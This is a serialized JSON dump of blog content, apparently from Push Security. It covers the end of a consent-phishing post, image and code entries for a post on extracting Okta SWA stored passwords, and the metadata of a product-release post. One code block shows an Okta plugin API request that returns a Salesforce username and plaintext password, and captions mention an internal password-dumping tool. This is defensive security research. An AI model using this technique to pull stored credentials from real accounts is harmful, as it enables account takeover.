program",[],{},{"nodeType":173,"value":271586,"marks":271587,"data":271588}," please get in touch.",[],{},{"nodeType":178,"data":271590,"content":271591},{},[271592,271596,271603,271606,271612],{"nodeType":173,"value":271593,"marks":271594,"data":271595},"Consent phishing is still an emerging technique and we believe that it has not reached peak usage by attackers yet. We are actively researching this attack technique as it continues to evolve. Follow us on Twitter ",[],{},{"nodeType":186,"data":271597,"content":271598},{"uri":117883},[271599],{"nodeType":173,"value":271600,"marks":271601,"data":271602},"@pushsecurity",[],{},{"nodeType":173,"value":2936,"marks":271604,"data":271605},[],{},{"nodeType":186,"data":271607,"content":271608},{"uri":117869},[271609],{"nodeType":173,"value":117876,"marks":271610,"data":271611},[],{},{"nodeType":173,"value":271613,"marks":271614,"data":271615}," or subscribe to our mailing list below to get the latest updates and tips for managing this for your users.",[],{},"Consent phishing: the emerging phishing technique that can bypass 2FA","Consent phishing is an emerging technique attackers are using to compromise user accounts, even if they have Multi-factor Authentication (MFA or 2FA) enabled.","2021-07-06T00:00:00.000+01:00","consent-phishing-the-emerging-phishing-technique-that-can-bypass-2fa",{"items":271621},[271622,271624],{"sys":271623,"name":505},{"id":504},{"sys":271625,"name":509},{"id":508},{"items":271627},[271628],{"fullName":271629,"firstName":71176,"jobTitle":271630,"profilePicture":271631},"Alex Triaca","Chief Architect",{"url":271632},"https://images.ctfassets.net/y1cdw1ablpvd/LmC3LyTH5V9NthbqKuqA2/8291887e41c15613bf98f6fd55773817/117-0-2.jpg",{"items":271634},[271635],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":271636},{"url":8615},{"json":271638,"links":272675},{"data":271639,"content":271640,"nodeType":165},{},[271641,271647,271653,271659,271665,271671,271677,271682,271688,271694,271700,271777,271782,271788,271794,271800,271830,271836,271842,271848,271854,271859,271865,271871,271892,271898,271903,271908,271914,271920,271926,271932,271938,271944,271950,271955,271960,271967,271973,271979,271985,271991,271997,272003,272009,272015,272021,272027,272033,272039,272044,272050,272056,272062,272068,272073,272078,272084,272090,272096,272117,272123,272128,272133,272139,272144,272150,272156,272166,272172,272178,272184,272190,272196,272212,272310,272316,272322,272364,272369,272375,272381,272387,272393,272399,272405,272410,272416,272432,272438,272444,272450,272456,272462,272468,272507,272513,272564,272570,272576,272633,272639,272645,272651,272657,272663,272669],{"data":271642,"content":271643,"nodeType":178},{},[271644],{"data":271645,"marks":271646,"value":258273,"nodeType":173},{},[],{"data":271648,"content":271649,"nodeType":178},{},[271650],{"data":271651,"marks":271652,"value":258280,"nodeType":173},{},[],{"data":271654,"content":271655,"nodeType":169},{},[271656],{"data":271657,"marks":271658,"value":258287,"nodeType":173},{},[],{"data":271660,"content":271661,"nodeType":178},{},[271662],{"data":271663,"marks":271664,"value":258294,"nodeType":173},{},[],{"data":271666,"content":271667,"nodeType":178},{},[271668],{"data":271669,"marks":271670,"value":258301,"nodeType":173},{},[],{"data":271672,"content":271673,"nodeType":178},{},[271674],{"data":271675,"marks":271676,"value":258308,"nodeType":173},{},[],{"data":271678,"content":271681,"nodeType":312},{"target":271679},{"sys":271680},{"id":258313,"type":317,"linkType":318},[],{"data":271683,"content":271684,"nodeType":178},{},[271685],{"data":271686,"marks":271687,"value":258321,"nodeType":173},{},[],{"data":271689,"content":271690,"nodeType":169},{},[271691],{"data":271692,"marks":271693,"value":258328,"nodeType":173},{},[],{"data":271695,"content":271696,"nodeType":178},{},[271697],{"data":271698,"marks":271699,"value":258335,"nodeType":173},{},[],{"data":271701,"content":271702,"nodeType":250},{},[271703,271716],{"data":271704,"content":271705,"nodeType":254},{},[271706],{"data":271707,"content":271708,"nodeType":178},{},[271709,271713],{"data":271710,"marks":271711,"value":258349,"nodeType":173},{},[271712],{"type":370},{"data":271714,"marks":271715,"value":258353,"nodeType":173},{},[],{"data":271717,"content":271718,"nodeType":254},{},[271719],{"data":271720,"content":271721,"nodeType":178},{},[271722,271726,271729,271736,271739,271746,271750,271753,271760,271764,271767,271774],{"data":271723,"marks":271724,"value":258364,"nodeType":173},{},[271725],{"type":370},{"data":271727,"marks":271728,"value":258368,"nodeType":173},{},[],{"data":271730,"content":271731,"nodeType":186},{"uri":181618},[271732],{"data":271733,"marks":271734,"value":258376,"nodeType":173},{},[271735],{"type":194},{"data":271737,"marks":271738,"value":2936,"nodeType":173},{},[],{"data":271740,"content":271741,"nodeType":186},{"uri":258382},[271742],{"data":271743,"marks":271744,"value":258388,"nodeType":173},{},[271745],{"type":194},{"data":271747,"marks":271748,"value":3107,"nodeType":173},{},[271749],{"type":370},{"data":271751,"marks":271752,"value":258396,"nodeType":173},{},[],{"data":271754,"content":271755,"nodeType":186},{"uri":258399},[271756],{"data":271757,"marks":271758,"value":258405,"nodeType":173},{},[271759],{"type":194},{"data":271761,"marks":271762,"value":1477,"nodeType":173},{},[271763],{"type":370},{"data":271765,"marks":271766,"value":258413,"nodeType":173},{},[],{"data":271768,"content":271769,"nodeType":186},{"uri":181557},[271770],{"data":271771,"marks":271772,"value":258421,"nodeType":173},{},[271773],{"type":194},{"data":271775,"marks":271776,"value":37,"nodeType":173},{},[],{"data":271778,"content":271781,"nodeType":312},{"target":271779},{"sys":271780},{"id":169040,"type":317,"linkType":318},[],{"data":271783,"content":271784,"nodeType":169},{},[271785],{"data":271786,"marks":271787,"value":258436,"nodeType":173},{},[],{"data":271789,"content":271790,"nodeType":178},{},[271791],{"data":271792,"marks":271793,"value":258443,"nodeType":173},{},[],{"data":271795,"content":271796,"nodeType":178},{},[271797],{"data":271798,"marks":271799,"value":258450,"nodeType":173},{},[],{"data":271801,"content":271802,"nodeType":250},{},[271803,271812,271821],{"data":271804,"content":271805,"nodeType":254},{},[271806],{"data":271807,"content":271808,"nodeType":178},{},[271809],{"data":271810,"marks":271811,"value":258463,"nodeType":173},{},[],{"data":271813,"content":271814,"nodeType":254},{},[271815],{"data":271816,"content":271817,"nodeType":178},{},[271818],{"data":271819,"marks":271820,"value":258473,"nodeType":173},{},[],{"data":271822,"content":271823,"nodeType":254},{},[271824],{"data":271825,"content":271826,"nodeType":178},{},[271827],{"data":271828,"marks":271829,"value":258483,"nodeType":173},{},[],{"data":271831,"content":271832,"nodeType":178},{},[271833],{"data":271834,"marks":271835,"value":258490,"nodeType":173},{},[],{"data":271837,"content":271838,"nodeType":178},{},[271839],{"data":271840,"marks":271841,"value":258497,"nodeType":173},{},[],{"data":271843,"content":271844,"nodeType":178},{},[271845],{"data":271846,"marks":271847,"value":258504,"nodeType":173},{},[],{"data":271849,"content":271850,"nodeType":178},{},[271851],{"data":271852,"marks":271853,"value":258511,"nodeType":173},{},[],{"data":271855,"content":271858,"nodeType":312},{"target":271856},{"sys":271857},{"id":258516,"type":317,"linkType":318},[],{"data":271860,"content":271861,"nodeType":178},{},[271862],{"data":271863,"marks":271864,"value":258524,"nodeType":173},{},[],{"data":271866,"content":271867,"nodeType":178},{},[271868],{"data":271869,"marks":271870,"value":258531,"nodeType":173},{},[],{"data":271872,"content":271873,"nodeType":250},{},[271874,271883],{"data":271875,"content":271876,"nodeType":254},{},[271877],{"data":271878,"content":271879,"nodeType":178},{},[271880],{"data":271881,"marks":271882,"value":258544,"nodeType":173},{},[],{"data":271884,"content":271885,"nodeType":254},{},[271886],{"data":271887,"content":271888,"nodeType":178},{},[271889],{"data":271890,"marks":271891,"value":258554,"nodeType":173},{},[],{"data":271893,"content":271894,"nodeType":178},{},[271895],{"data":271896,"marks":271897,"value":258561,"nodeType":173},{},[],{"data":271899,"content":271902,"nodeType":312},{"target":271900},{"sys":271901},{"id":258566,"type":317,"linkType":318},[],{"data":271904,"content":271907,"nodeType":312},{"target":271905},{"sys":271906},{"id":258572,"type":317,"linkType":318},[],{"data":271909,"content":271910,"nodeType":169},{},[271911],{"data":271912,"marks":271913,"value":258580,"nodeType":173},{},[],{"data":271915,"content":271916,"nodeType":178},{},[271917],{"data":271918,"marks":271919,"value":258587,"nodeType":173},{},[],{"data":271921,"content":271922,"nodeType":178},{},[271923],{"data":271924,"marks":271925,"value":258594,"nodeType":173},{},[],{"data":271927,"content":271928,"nodeType":235},{},[271929],{"data":271930,"marks":271931,"value":258601,"nodeType":173},{},[],{"data":271933,"content":271934,"nodeType":178},{},[271935],{"data":271936,"marks":271937,"value":258608,"nodeType":173},{},[],{"data":271939,"content":271940,"nodeType":178},{},[271941],{"data":271942,"marks":271943,"value":258615,"nodeType":173},{},[],{"data":271945,"content":271946,"nodeType":178},{},[271947],{"data":271948,"marks":271949,"value":258622,"nodeType":173},{},[],{"data":271951,"content":271954,"nodeType":312},{"target":271952},{"sys":271953},{"id":258627,"type":317,"linkType":318},[],{"data":271956,"content":271959,"nodeType":312},{"target":271957},{"sys":271958},{"id":258633,"type":317,"linkType":318},[],{"data":271961,"content":271962,"nodeType":178},{},[271963],{"data":271964,"marks":271965,"value":258642,"nodeType":173},{},[271966],{"type":1646},{"data":271968,"content":271969,"nodeType":178},{},[271970],{"data":271971,"marks":271972,"value":258649,"nodeType":173},{},[],{"data":271974,"content":271975,"nodeType":235},{},[271976],{"data":271977,"marks":271978,"value":258656,"nodeType":173},{},[],{"data":271980,"content":271981,"nodeType":178},{},[271982],{"data":271983,"marks":271984,"value":258663,"nodeType":173},{},[],{"data":271986,"content":271987,"nodeType":178},{},[271988],{"data":271989,"marks":271990,"value":258670,"nodeType":173},{},[],{"data":271992,"content":271993,"nodeType":178},{},[271994],{"data":271995,"marks":271996,"value":258677,"nodeType":173},{},[],{"data":271998,"content":271999,"nodeType":235},{},[272000],{"data":272001,"marks":272002,"value":258684,"nodeType":173},{},[],{"data":272004,"content":272005,"nodeType":178},{},[272006],{"data":272007,"marks":272008,"value":258691,"nodeType":173},{},[],{"data":272010,"content":272011,"nodeType":178},{},[272012],{"data":272013,"marks":272014,"value":258698,"nodeType":173},{},[],{"data":272016,"content":272017,"nodeType":235},{},[272018],{"data":272019,"marks":272020,"value":258705,"nodeType":173},{},[],{"data":272022,"content":272023,"nodeType":178},{},[272024],{"data":272025,"marks":272026,"value":258712,"nodeType":173},{},[],{"data":272028,"content":272029,"nodeType":178},{},[272030],{"data":272031,"marks":272032,"value":258719,"nodeType":173},{},[],{"data":272034,"content":272035,"nodeType":178},{},[272036],{"data":272037,"marks":272038,"value":258726,"nodeType":173},{},[],{"data":272040,"content":272043,"nodeType":312},{"target":272041},{"sys":272042},{"id":209109,"type":317,"linkType":318},[],{"data":272045,"content":272046,"nodeType":169},{},[272047],{"data":272048,"marks":272049,"value":258738,"nodeType":173},{},[],{"data":272051,"content":272052,"nodeType":178},{},[272053],{"data":272054,"marks":272055,"value":258745,"nodeType":173},{},[],{"data":272057,"content":272058,"nodeType":235},{},[272059],{"data":272060,"marks":272061,"value":258752,"nodeType":173},{},[],{"data":272063,"content":272064,"nodeType":178},{},[272065],{"data":272066,"marks":272067,"value":258759,"nodeType":173},{},[],{"data":272069,"content":272072,"nodeType":312},{"target":272070},{"sys":272071},{"id":258764,"type":317,"linkType":318},[],{"data":272074,"content":272077,"nodeType":312},{"target":272075},{"sys":272076},{"id":258770,"type":317,"linkType":318},[],{"data":272079,"content":272080,"nodeType":235},{},[272081],{"data":272082,"marks":272083,"value":258778,"nodeType":173},{},[],{"data":272085,"content":272086,"nodeType":178},{},[272087],{"data":272088,"marks":272089,"value":258785,"nodeType":173},{},[],{"data":272091,"content":272092,"nodeType":178},{},[272093],{"data":272094,"marks":272095,"value":258792,"nodeType":173},{},[],{"data":272097,"content":272098,"nodeType":250},{},[272099,272108],{"data":272100,"content":272101,"nodeType":254},{},[272102],{"data":272103,"content":272104,"nodeType":178},{},[272105],{"data":272106,"marks":272107,"value":258805,"nodeType":173},{},[],{"data":272109,"content":272110,"nodeType":254},{},[272111],{"data":272112,"content":272113,"nodeType":178},{},[272114],{"data":272115,"marks":272116,"value":258815,"nodeType":173},{},[],{"data":272118,"content":272119,"nodeType":178},{},[272120],{"data":272121,"marks":272122,"value":258822,"nodeType":173},{},[],{"data":272124,"content":272127,"nodeType":312},{"target":272125},{"sys":272126},{"id":258827,"type":317,"linkType":318},[],{"data":272129,"content":272132,"nodeType":312},{"target":272130},{"sys":272131},{"id":258833,"type":317,"linkType":318},[],{"data":272134,"content":272135,"nodeType":178},{},[272136],{"data":272137,"marks":272138,"value":258841,"nodeType":173},{},[],{"data":272140,"content":272143,"nodeType":312},{"target":272141},{"sys":272142},{"id":258846,"type":317,"linkType":318},[],{"data":272145,"content":272146,"nodeType":169},{},[272147],{"data":272148,"marks":272149,"value":258854,"nodeType":173},{},[],{"data":272151,"content":272152,"nodeType":178},{},[272153],{"data":272154,"marks":272155,"value":258861,"nodeType":173},{},[],{"data":272157,"content":272158,"nodeType":178},{},[272159,272163],{"data":272160,"marks":272161,"value":258869,"nodeType":173},{},[272162],{"type":370},{"data":272164,"marks":272165,"value":1477,"nodeType":173},{},[],{"data":272167,"content":272168,"nodeType":178},{},[272169],{"data":272170,"marks":272171,"value":258879,"nodeType":173},{},[],{"data":272173,"content":272174,"nodeType":178},{},[272175],{"data":272176,"marks":272177,"value":258886,"nodeType":173},{},[],{"data":272179,"content":272180,"nodeType":178},{},[272181],{"data":272182,"marks":272183,"value":258893,"nodeType":173},{},[],{"data":272185,"content":272186,"nodeType":178},{},[272187],{"data":272188,"marks":272189,"value":258900,"nodeType":173},{},[],{"data":272191,"content":272192,"nodeType":178},{},[272193],{"data":272194,"marks":272195,"value":258907,"nodeType":173},{},[],{"data":272197,"content":272198,"nodeType":178},{},[272199,272202,272209],{"data":272200,"marks":272201,"value":230045,"nodeType":173},{},[],{"data":272203,"content":272204,"nodeType":186},{"uri":88239},[272205],{"data":272206,"marks":272207,"value":88245,"nodeType":173},{},[272208],{"type":194},{"data":272210,"marks":272211,"value":258924,"nodeType":173},{},[],{"data":272213,"content":272214,"nodeType":250},{},[272215,272234,272253,272272,272291],{"data":272216,"content":272217,"nodeType":254},{},[272218],{"data":272219,"content":272220,"nodeType":178},{},[272221,272224,272231],{"data":272222,"marks":272223,"value":37,"nodeType":173},{},[],{"data":272225,"content":272226,"nodeType":186},{"uri":59347},[272227],{"data":272228,"marks":272229,"value":230075,"nodeType":173},{},[272230],{"type":194},{"data":272232,"marks":272233,"value":37,"nodeType":173},{},[],{"data":272235,"content":272236,"nodeType":254},{},[272237],{"data":272238,"content":272239,"nodeType":178},{},[272240,272243,272250],{"data":272241,"marks":272242,"value":37,"nodeType":173},{},[],{"data":272244,"content":272245,"nodeType":186},{"uri":230093},[272246],{"data":272247,"marks":272248,"value":230096,"nodeType":173},{},[272249],{"type":194},{"data":272251,"marks":272252,"value":37,"nodeType":173},{},[],{"data":272254,"content":272255,"nodeType":254},{},[272256],{"data":272257,"content":272258,"nodeType":178},{},[272259,272262,272269],{"data":272260,"marks":272261,"value":37,"nodeType":173},{},[],{"data":272263,"content":272264,"nodeType":186},{"uri":832},[272265],{"data":272266,"marks":272267,"value":230116,"nodeType":173},{},[272268],{"type":194},{"data":272270,"marks":272271,"value":37,"nodeType":173},{},[],{"data":272273,"content":272274,"nodeType":254},{},[272275],{"data":272276,"content":272277,"nodeType":178},{},[272278,272281,272288],{"data":272279,"marks":272280,"value":37,"nodeType":173},{},[],{"data":272282,"content":272283,"nodeType":186},{"uri":197688},[272284],{"data":272285,"marks":272286,"value":230136,"nodeType":173},{},[272287],{"type":194},{"data":272289,"marks":272290,"value":37,"nodeType":173},{},[],{"data":272292,"content":272293,"nodeType":254},{},[272294],{"data":272295,"content":272296,"nodeType":178},{},[272297,272300,272307],{"data":272298,"marks":272299,"value":37,"nodeType":173},{},[],{"data":272301,"content":272302,"nodeType":186},{"uri":144083},[272303],{"data":272304,"marks":272305,"value":230156,"nodeType":173},{},[272306],{"type":194},{"data":272308,"marks":272309,"value":37,"nodeType":173},{},[],{"data":272311,"content":272312,"nodeType":169},{},[272313],{"data":272314,"marks":272315,"value":259029,"nodeType":173},{},[],{"data":272317,"content":272318,"nodeType":178},{},[272319],{"data":272320,"marks":272321,"value":259036,"nodeType":173},{},[],{"data":272323,"content":272324,"nodeType":250},{},[272325,272338,272351],{"data":272326,"content":272327,"nodeType":254},{},[272328],{"data":272329,"content":272330,"nodeType":178},{},[272331,272335],{"data":272332,"marks":272333,"value":259050,"nodeType":173},{},[272334],{"type":370},{"data":272336,"marks":272337,"value":259054,"nodeType":173},{},[],{"data":272339,"content":272340,"nodeType":254},{},[272341],{"data":272342,"content":272343,"nodeType":178},{},[272344,272348],{"data":272345,"marks":272346,"value":259065,"nodeType":173},{},[272347],{"type":370},{"data":272349,"marks":272350,"value":259069,"nodeType":173},{},[],{"data":272352,"content":272353,"nodeType":254},{},[272354],{"data":272355,"content":272356,"nodeType":178},{},[272357,272361],{"data":272358,"marks":272359,"value":259080,"nodeType":173},{},[272360],{"type":370},{"data":272362,"marks":272363,"value":259084,"nodeType":173},{},[],{"data":272365,"content":272368,"nodeType":312},{"target":272366},{"sys":272367},{"id":259089,"type":317,"linkType":318},[],{"data":272370,"content":272371,"nodeType":178},{},[272372],{"data":272373,"marks":272374,"value":259097,"nodeType":173},{},[],{"data":272376,"content":272377,"nodeType":235},{},[272378],{"data":272379,"marks":272380,"value":259104,"nodeType":173},{},[],{"data":272382,"content":272383,"nodeType":178},{},[272384],{"data":272385,"marks":272386,"value":259111,"nodeType":173},{},[],{"data":272388,"content":272389,"nodeType":178},{},[272390],{"data":272391,"marks":272392,"value":259118,"nodeType":173},{},[],{"data":272394,"content":272395,"nodeType":178},{},[272396],{"data":272397,"marks":272398,"value":259125,"nodeType":173},{},[],{"data":272400,"content":272401,"nodeType":178},{},[272402],{"data":272403,"marks":272404,"value":259132,"nodeType":173},{},[],{"data":272406,"content":272409,"nodeType":312},{"target":272407},{"sys":272408},{"id":259137,"type":317,"linkType":318},[],{"data":272411,"content":272412,"nodeType":178},{},[272413],{"data":272414,"marks":272415,"value":259145,"nodeType":173},{},[],{"data":272417,"content":272418,"nodeType":178},{},[272419,272422,272429],{"data":272420,"marks":272421,"value":259152,"nodeType":173},{},[],{"data":272423,"content":272424,"nodeType":186},{"uri":259155},[272425],{"data":272426,"marks":272427,"value":259161,"nodeType":173},{},[272428],{"type":194},{"data":272430,"marks":272431,"value":1477,"nodeType":173},{},[],{"data":272433,"content":272434,"nodeType":169},{},[272435],{"data":272436,"marks":272437,"value":259171,"nodeType":173},{},[],{"data":272439,"content":272440,"nodeType":178},{},[272441],{"data":272442,"marks":272443,"value":259178,"nodeType":173},{},[],{"data":272445,"content":272446,"nodeType":178},{},[272447],{"data":272448,"marks":272449,"value":259185,"nodeType":173},{},[],{"data":272451,"content":272452,"nodeType":178},{},[272453],{"data":272454,"marks":272455,"value":259192,"nodeType":173},{},[],{"data":272457,"content":272458,"nodeType":178},{},[272459],{"data":272460,"marks":272461,"value":259199,"nodeType":173},{},[],{"data":272463,"content":272464,"nodeType":178},{},[272465],{"data":272466,"marks":272467,"value":259206,"nodeType":173},{},[],{"data":272469,"content":272470,"nodeType":250},{},[272471,272480,272489,272498],{"data":272472,"content":272473,"nodeType":254},{},[272474],{"data":272475,"content":272476,"nodeType":178},{},[272477],{"data":272478,"marks":272479,"value":259219,"nodeType":173},{},[],{"data":272481,"content":272482,"nodeType":254},{},[272483],{"data":272484,"content":272485,"nodeType":178},{},[272486],{"data":272487,"marks":272488,"value":259229,"nodeType":173},{},[],{"data":272490,"content":272491,"nodeType":254},{},[272492],{"data":272493,"content":272494,"nodeType":178},{},[272495],{"data":272496,"marks":272497,"value":259239,"nodeType":173},{},[],{"data":272499,"content":272500,"nodeType":254},{},[272501],{"data":272502,"content":272503,"nodeType":178},{},[272504],{"data":272505,"marks":272506,"value":259249,"nodeType":173},{},[],{"data":272508,"content":272509,"nodeType":178},{},[272510],{"data":272511,"marks":272512,"value":259256,"nodeType":173},{},[],{"data":272514,"content":272515,"nodeType":250},{},[272516,272545],{"data":272517,"content":272518,"nodeType":254},{},[272519],{"data":272520,"content":272521,"nodeType":178},{},[272522,272525,272532,272535,272542],{"data":272523,"marks":272524,"value":259269,"nodeType":173},{},[],{"data":272526,"content":272527,"nodeType":186},{"uri":59347},[272528],{"data":272529,"marks":272530,"value":59350,"nodeType":173},{},[272531],{"type":194},{"data":272533,"marks":272534,"value":933,"nodeType":173},{},[],{"data":272536,"content":272537,"nodeType":186},{"uri":832},[272538],{"data":272539,"marks":272540,"value":835,"nodeType":173},{},[272541],{"type":194},{"data":272543,"marks":272544,"value":37,"nodeType":173},{},[],{"data":272546,"content":272547,"nodeType":254},{},[272548],{"data":272549,"content":272550,"nodeType":178},{},[272551,272554,272561],{"data":272552,"marks":272553,"value":259299,"nodeType":173},{},[],{"data":272555,"content":272556,"nodeType":186},{"uri":230093},[272557],{"data":272558,"marks":272559,"value":259307,"nodeType":173},{},[272560],{"type":194},{"data":272562,"marks":272563,"value":259311,"nodeType":173},{},[],{"data":272565,"content":272566,"nodeType":169},{},[272567],{"data":272568,"marks":272569,"value":15539,"nodeType":173},{},[],{"data":272571,"content":272572,"nodeType":178},{},[272573],{"data":272574,"marks":272575,"value":259324,"nodeType":173},{},[],{"data":272577,"content":272578,"nodeType":250},{},[272579,272588,272597,272606,272615,272624],{"data":272580,"content":272581,"nodeType":254},{},[272582],{"data":272583,"content":272584,"nodeType":178},{},[272585],{"data":272586,"marks":272587,"value":259337,"nodeType":173},{},[],{"data":272589,"content":272590,"nodeType":254},{},[272591],{"data":272592,"content":272593,"nodeType":178},{},[272594],{"data":272595,"marks":272596,"value":259347,"nodeType":173},{},[],{"data":272598,"content":272599,"nodeType":254},{},[272600],{"data":272601,"content":272602,"nodeType":178},{},[272603],{"data":272604,"marks":272605,"value":259357,"nodeType":173},{},[],{"data":272607,"content":272608,"nodeType":254},{},[272609],{"data":272610,"content":272611,"nodeType":178},{},[272612],{"data":272613,"marks":272614,"value":259367,"nodeType":173},{},[],{"data":272616,"content":272617,"nodeType":254},{},[272618],{"data":272619,"content":272620,"nodeType":178},{},[272621],{"data":272622,"marks":272623,"value":259377,"nodeType":173},{},[],{"data":272625,"content":272626,"nodeType":254},{},[272627],{"data":272628,"content":272629,"nodeType":178},{},[272630],{"data":272631,"marks":272632,"value":259387,"nodeType":173},{},[],{"data":272634,"content":272635,"nodeType":169},{},[272636],{"data":272637,"marks":272638,"value":40632,"nodeType":173},{},[],{"data":272640,"content":272641,"nodeType":178},{},[272642],{"data":272643,"marks":272644,"value":259400,"nodeType":173},{},[],{"data":272646,"content":272647,"nodeType":178},{},[272648],{"data":272649,"marks":272650,"value":259407,"nodeType":173},{},[],{"data":272652,"content":272653,"nodeType":178},{},[272654],{"data":272655,"marks":272656,"value":259414,"nodeType":173},{},[],{"data":272658,"content":272659,"nodeType":178},{},[272660],{"data":272661,"marks":272662,"value":259421,"nodeType":173},{},[],{"data":272664,"content":272665,"nodeType":178},{},[272666],{"data":272667,"marks":272668,"value":259428,"nodeType":173},{},[],{"data":272670,"content":272671,"nodeType":178},{},[272672],{"data":272673,"marks":272674,"value":259435,"nodeType":173},{},[],{"entries":272676},{"hyperlink":272677,"inline":272678,"block":272679},[],[],[272680,272687,272689,272696,272704,272712,272720,272724,272726,272732,272739,272744,272750,272756,272762],{"sys":272681,"__typename":5345,"title":272682,"caption":118,"layoutMode":118,"file":272683},{"id":258313},"SWA for Salesforce ",{"url":272684,"width":272685,"height":272686},"https://images.ctfassets.net/y1cdw1ablpvd/3aoL5dRRGM3VL3k6GDXmHg/db100cfc57bf0fa34bd822d5f475984f/image10.png",1053,1007,{"sys":272688,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":272690,"__typename":5345,"title":272691,"caption":118,"layoutMode":118,"file":272692},{"id":258516},"SWA configuration",{"url":272693,"width":272694,"height":272695},"https://images.ctfassets.net/y1cdw1ablpvd/78s95OShHAzkXFlc7e14Hd/b6ac238115249a5fe71080bf0142a9dc/image13.png",682,293,{"sys":272697,"__typename":5345,"title":272698,"caption":272699,"layoutMode":118,"file":272700},{"id":258566},"SWA credential details","Administrators can disable password reveal on a per-app basis, as can be seen by unchecking the box here",{"url":272701,"width":272702,"height":272703},"https://images.ctfassets.net/y1cdw1ablpvd/3FrFNvcjFdBXGtf0ynfLZ/b4d0f5d15787e8a084faeca8512e2725/image8.png",684,243,{"sys":272705,"__typename":5345,"title":272706,"caption":272707,"layoutMode":118,"file":272708},{"id":258572},"Salesforce login","When password reveal is disabled, users see this message and cannot request the credentials",{"url":272709,"width":272710,"height":272711},"https://images.ctfassets.net/y1cdw1ablpvd/6q0nLXJSCURTJWZblqT9vq/a69e68276777f1a9f3ad7ebe89ebc139/image6.png",326,532,{"sys":272713,"__typename":5345,"title":272714,"caption":272715,"layoutMode":118,"file":272716},{"id":258627},"Okta extension","Clicking the Salesforce login button triggers a web request which returns the data shown below (and which is visible to the user through for example the browser’s built-in devtools)",{"url":272717,"width":272718,"height":272719},"https://images.ctfassets.net/y1cdw1ablpvd/LyjRr43VyfcQWpzlV3EQ5/56081e155d8a3fcb8d3aa80def11ff26/image7.png",453,504,{"sys":272721,"__typename":134274,"name":272722,"type":5439,"syntax":272723},{"id":258633},"Salesforce web request data","GET /api/plugin/2/app/salesforce/0oa5ybnree2VPL6EA0x7/flow?plugin_version=6.20.0-73.101.0 HTTP/2\n\n\n{\n  \"scripts\": {\n    \"script\": [\n      {\n        \"action\": [\n          {\n            \"id\": \"username\",\n            \"value\": \"lukejennings@bugcrowdninja.com\",\n            ...\n          },\n          {\n                        \"id\": \"password\",\n                       \"value\": \"MySalesforcePassword1\",\n            ...\n          },\n          {\n            \"type\": \"click\",\n\n\n\n            \"element\": \"css=input[id=\\\"Login\\\"]\",\n            ...\n          }\n        ],\n        \"name\": \"Login\"\n      }\n    ]\n  },\n  \"urls\": {\n    \"match\": [\n      {\n        \"exact\": false,\n        \"isRegex\": false,\n        \"matchFrames\": false,\n        \"url\": \"https://login.salesforce.com\",\n        \"scriptName\": \"Login\"\n      }\n    ]\n  },\n  \"annotated\": false,\n  \"hasEncryptedValues\": false,\n  \"appName\": \"salesforce\",\n  \"signOnModeType\": \"BROWSER_PLUGIN\"\n}\n",{"sys":272725,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},{"sys":272727,"__typename":5345,"title":272728,"caption":118,"layoutMode":118,"file":272729},{"id":258764},"Password reveal API",{"url":272730,"width":164521,"height":272731},"https://images.ctfassets.net/y1cdw1ablpvd/4mqIfbFwKPhLepm4he2skV/194964f3261c5a9e564899068049e54d/image3.png",130,{"sys":272733,"__typename":5345,"title":272734,"caption":118,"layoutMode":118,"file":272735},{"id":258770},"Password reveal API 2",{"url":272736,"width":272737,"height":272738},"https://images.ctfassets.net/y1cdw1ablpvd/66tquT2FlW6ZEkzwu3eGH1/292c902f9a364e2dc3b25506ac4ecb13/image11.png",1069,463,{"sys":272740,"__typename":5345,"title":272741,"caption":118,"layoutMode":118,"file":272742},{"id":258827},"Okta token storage",{"url":272743,"width":219903,"height":192166},"https://images.ctfassets.net/y1cdw1ablpvd/3JyyiqyemQR7HeztvdB98u/a35a82a49e4ef168579a52de66ea6892/image14.png",{"sys":272745,"__typename":5345,"title":272746,"caption":118,"layoutMode":118,"file":272747},{"id":258833},"Okta token storage 2",{"url":272748,"width":272749,"height":123322},"https://images.ctfassets.net/y1cdw1ablpvd/1gUig6FNPvlAqGaqSoBrbM/36afab96a0c4d2a1ec4ac64a7c34f066/image4.png",898,{"sys":272751,"__typename":5345,"title":272752,"caption":118,"layoutMode":118,"file":272753},{"id":258846},"Okta internal POC",{"url":272754,"width":5358,"height":272755},"https://images.ctfassets.net/y1cdw1ablpvd/naYWcydapvxMisBc4I0d2/41e0b5e816b38927354e39d39414d97f/image5.png",350,{"sys":272757,"__typename":5345,"title":272758,"caption":118,"layoutMode":118,"file":272759},{"id":259089},"Okta log events",{"url":272760,"width":272761,"height":260446},"https://images.ctfassets.net/y1cdw1ablpvd/7g9KCqO9mqC9mxaJH4O8u5/8062fc4441cd42371c0a97642a6d8de5/image2.png",999,{"sys":272763,"__typename":5345,"title":272764,"caption":118,"layoutMode":118,"file":272765},{"id":259137},"Logs generated by our internal SWA password dumping tool",{"url":272766,"width":272767,"height":272768},"https://images.ctfassets.net/y1cdw1ablpvd/3Ok01IBCObf6bsLmOeWLA1/727605fae8500d4e9c2284299ea82617/image1.png",1016,724,"content:blog:okta-swa.json","blog/okta-swa.json","blog/okta-swa",{"_path":272773,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":272774,"ogImage":118,"summary":272776,"title":253854,"subtitle":118,"metaTitle":272787,"synopsis":253855,"hashTags":118,"publishedDate":253856,"slug":253857,"tagsCollection":272788,"authorsCollection":272792,"content":272796,"relatedBlogPostsCollection":273020,"_id":273197,"_type":5439,"_source":5440,"_file":273198,"_stem":273199,"_extension":5439},"/blog/product-release-november-2023",{"id":253640,"publishedAt":272775},"2024-02-06T15:37:46.712Z",{"json":272777},{"data":272778,"content":272779,"nodeType":165},{},[272780],{"data":272781,"content":272782,"nodeType":178},{},[272783],{"data":272784,"marks":272785,"value":272786,"nodeType":173},{},[],"New finding type for leaked passwords, automatic licensing for new employees, and improved filtering options ","Push Security new product features for November 2023 